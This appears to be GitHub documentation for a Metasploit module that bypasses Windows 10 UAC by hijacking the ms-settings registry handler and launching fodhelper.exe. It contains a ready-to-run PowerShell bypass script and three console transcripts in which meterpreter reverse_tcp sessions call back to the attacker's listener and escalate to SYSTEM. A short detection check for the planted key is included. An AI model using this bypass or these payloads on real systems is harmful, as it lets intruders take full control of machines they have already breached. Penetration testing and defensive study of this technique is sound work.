Windows 10 BypassUAC fodhelper module

exploit/windows/local/bypassuac_fodhelper module

This module bypasses Windows 10 UAC by hijacking the ms-settings: protocol handler in the current user's registry hive (HKCU\Software\Classes\ms-settings\shell\open\command) and inserting a custom command that is executed when the Windows fodhelper.exe application is launched. fodhelper.exe is a Microsoft-signed, auto-elevating binary, so it starts at high integrity without a consent prompt and the command it spawns inherits that elevation: the module yields a second session whose token is no longer UAC-filtered, and getsystem then succeeds from that session, as the transcripts below show. The technique requires the session user to be a member of the local Administrators group and UAC to be below the "Always Notify" level (the default level or lower); the module checks both before continuing. The module writes the registry key only for the duration of the exploit and removes it once the payload has been invoked, but the write itself is still visible to registry monitoring (for example Sysmon Event ID 13 on that key path), so cleanup is not the same as stealth. The architecture of the payload does not need to match the OS: an x86 Meterpreter on x64 Windows works, in which case the module launches cmd.exe through C:\Windows\Sysnative to escape WOW64 file-system redirection and reach the 64-bit fodhelper.exe. In every transcript below the elevated session is an x86 Meterpreter, even when the initial session was x64, because the module's default target is Windows x86; choose the x64 target and an x64 payload if you need a 64-bit elevated session. If specifying EXE::Custom your DLL should call ExitProcess() after starting your payload in a separate process.
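The registry hijack described above, reproduced by hand in PowerShell, with a check that reports whether the handler key is currently planted. This is an added example and is not the module's own code or a Metasploit script. It assumes it is run from a native (64-bit on x64) medium-integrity PowerShell as a member of the local Administrators group with UAC at its default level, the same conditions the module verifies in the transcripts; the key path and the DelegateExecute value name are those the public technique uses, and the function names are this example's own. Start-Sleep gives fodhelper time to read the key before cleanup; adjust it on a slow host.

```powershell
# Added example (not the module's own code): manual reproduction of the
# fodhelper UAC bypass plus a check for the registry hijack it relies on.
# Assumptions: native-architecture PowerShell (a 32-bit process would have
# System32 redirected and must use Sysnative, as the module's transcript
# shows), user is in local Administrators, UAC at the default level.

$HijackKey = 'HKCU:\Software\Classes\ms-settings\shell\open\command'

function Test-FodhelperHijack {
    # Detection-side check: a clean host has no ms-settings handler under
    # HKCU at all, so the presence of this key is itself suspicious; a
    # DelegateExecute value plus a default command is the hijack.
    if (-not (Test-Path -Path $HijackKey)) {
        return [pscustomobject]@{ Present = $false; Command = $null; DelegateExecute = $false }
    }
    $props = Get-ItemProperty -Path $HijackKey
    [pscustomobject]@{
        Present         = $true
        Command         = $props.'(default)'
        DelegateExecute = ($null -ne $props.PSObject.Properties['DelegateExecute'])
    }
}

function Invoke-FodhelperBypass {
    param(
        # Command that will run at high integrity; whoami /groups shows the
        # "High Mandatory Level" label in the resulting window.
        [string]$Command = "$env:SystemRoot\System32\cmd.exe /k whoami /groups"
    )
    # 1. Plant the handler. fodhelper.exe opens the ms-settings: protocol
    #    via ShellExecute, which consults HKCU\Software\Classes before
    #    HKLM. An empty DelegateExecute value makes the shell fall back
    #    to running the key's default command.
    New-Item -Path $HijackKey -Force | Out-Null
    New-ItemProperty -Path $HijackKey -Name 'DelegateExecute' -Value '' -PropertyType String -Force | Out-Null
    Set-ItemProperty -Path $HijackKey -Name '(default)' -Value $Command
    try {
        # 2. Launch the auto-elevating binary; no consent prompt appears
        #    because it is a signed Microsoft binary with autoElevate set.
        Start-Process -FilePath "$env:SystemRoot\System32\fodhelper.exe"
        Start-Sleep -Seconds 3
    }
    finally {
        # 3. Remove the key, as the module does after the payload runs.
        #    The write already happened and is visible to registry
        #    auditing (e.g. Sysmon Event ID 13), so this is hygiene only.
        Remove-Item -Path 'HKCU:\Software\Classes\ms-settings' -Recurse -Force -ErrorAction SilentlyContinue
    }
}

# Usage:
Test-FodhelperHijack      # Present = False on a clean host
Invoke-FodhelperBypass    # spawns an elevated cmd.exe
Test-FodhelperHijack      # Present = False again after cleanup
```

Test-FodhelperHijack on its own is the defender's check: run it across user hives (or alert on Sysmon registry events for that path) rather than relying on the attacker's cleanup, since the window between the write and the Remove-Item is exactly when the bypass fires.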

Windows 10 x86

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x86_IP>:49423) at 2017-06-01 10:02:18 -0500

meterpreter > sysinfo
Computer        : DESKTOP-GS5CHPG
OS              : Windows 10 (Build 10240).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > getuid
Server username: DESKTOP-GS5CHPG\msfuser
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x86_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x86_IP>:49424) at 2017-06-01 10:03:28 -0500
[*] Cleaning up registry keys ...

meterpreter > getuid
Server username: DESKTOP-GS5CHPG\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : DESKTOP-GS5CHPG
OS              : Windows 10 (Build 10240).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > 


Windows 10 x64 with x86 payload

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49422) at 2017-06-01 10:05:04 -0500

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > show options

Module options (exploit/windows/local/bypassuac_fodhelper):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  1                yes       The session to run this module on.


Exploit target:

   Id  Name
   --  ----
   0   Windows x86


msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49423) at 2017-06-01 10:06:02 -0500
[*] Cleaning up registry keys ...

meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 


Windows 10 x64 with x64 payload

msf exploit(handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     <MSF_IP>         yes       The listen address
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(handler) > run

[*] Started reverse TCP handler on <MSF_IP>:4567 
[*] Starting the payload handler...
[*] Sending stage (1189423 bytes) to <Win10x64_IP>
[*] Meterpreter session 1 opened (<MSF_IP>:4567 -> <Win10x64_IP>:49424) at 2017-06-01 10:07:48 -0500

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 1...
msf exploit(handler) > use exploit/windows/local/bypassuac_fodhelper 
msf exploit(bypassuac_fodhelper) > set session 1
session => 1
msf exploit(bypassuac_fodhelper) > run

[*] Started reverse TCP handler on <MSF_IP>:4444 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\fodhelper.exe
[*] Sending stage (957487 bytes) to <Win10x64_IP>
[*] Meterpreter session 2 opened (<MSF_IP>:4444 -> <Win10x64_IP>:49425) at 2017-06-01 10:08:41 -0500
[*] Cleaning up registry keys ...

meterpreter > sysinfo
Computer        : DESKTOP-AI9785J
OS              : Windows 10 (Build 10240).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: DESKTOP-AI9785J\msfuser
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 


Source: Github